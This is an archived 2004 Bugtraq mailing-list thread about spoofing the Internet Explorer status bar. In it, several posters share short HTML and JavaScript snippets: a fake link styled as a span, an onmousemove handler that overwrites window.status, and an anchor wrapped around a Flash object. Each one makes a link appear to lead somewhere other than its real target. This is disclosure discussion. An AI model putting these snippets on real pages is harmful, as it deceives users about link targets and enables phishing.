lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <22342395A9909442AF5AF5E2ED850CF7D8AE80@mercury.internal.phg.com.au>
Date: Wed, 17 Nov 2004 15:25:05 +1100
From: "Michael Silk" <michaels@....com.au>
To: "q q" <systemcracker@...il.com>, <bugtraq@...urityfocus.com>
Subject: RE: New URL spoofing bug in Microsoft Internet Explorer


Or even a fake "a" tag:

<span style="color: blue; text-decoration: underline; cursor: hand;"
onmouseover="window.status = 'http://www.msn.com/';"
onmouseout="window.status = 'Done.'" onclick="document.location =
'http://www.google.com'"> Visit Msn! </span> 

-----Original Message-----
From: q q [mailto:systemcracker@...il.com] 
Sent: Wednesday, 17 November 2004 3:11 AM
To: bugtraq@...urityfocus.com
Subject: Re: New URL spoofing bug in Microsoft Internet Explorer

I thought this was obvious, but having seen the amount of discussion,
here's another URL spoofer:

<a href="http://www.google.com"
onmousemove="window.status='http://www.msn.com';"
onmouseout="window.status='Done.';">Visit Msn!</a>

note that 

<a href="http://www.google.com"
onmouseover="window.status='http://www.msn.com';"
onmouseout="window.status='Done.';">Visit Msn!</a>

won't work - it seems MS have already half fixed this....

(tested on MSIE 6.0, winXP)


On 8 Nov 2004 23:30:55 -0000, roozbeh afrasiabi
<roozbeh_afrasiabi@...oo.com> wrote:
> In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@...computer>
> 
> Here is another way of spoofing the status bar:
> 
> <a> tag + <object> tag
> 
> <!--A HREF=http://www.yahoo.com><!--OBJECT
classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
> 
>
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflas
h.cab#version=6,0,0,0"
> 
> WIDTH="300" HEIGHT="50" id="link" ALIGN="">
> 
> <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > 
> <PARAM NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu
> 
> VALU=FALSE>
> 
>  <EMBED src="link.swf" quality=high bgcolor=#FFFFFF  WIDTH="300"
HEIGHT="50" NAME="link" ALIGN=""
> 
> TYPE="application/x-shockwave-flash" 
> PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
> 
> </a></OBJECT></a>
> 
> *this method of spoofing the status bar allows malicious users to hide

> the target url from suspecting ppl ,demo page uses flash to generate
> 
> random urls.
> 
> demo:
> 
> http://www.persiax.com/pocs/statusbar/status.htm
> 
> 


--
PHP, mySQL Security and more at http://www.puremango.co.uk




**********************************************************************
This email message and accompanying data may contain information that is confidential and/or subject to legal privilege. If you are not the intended recipient, you are notified that any use, dissemination, distribution or copying of this message or data is prohibited. If you have received this email message in error, please notify us immediately and erase all copies of this message and attachments.

This email is for your convenience only, you should not rely on any information contained herein for contractual or legal purposes. You should only rely on information and/or instructions in writing and on company letterhead signed by authorised persons.
**********************************************************************



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ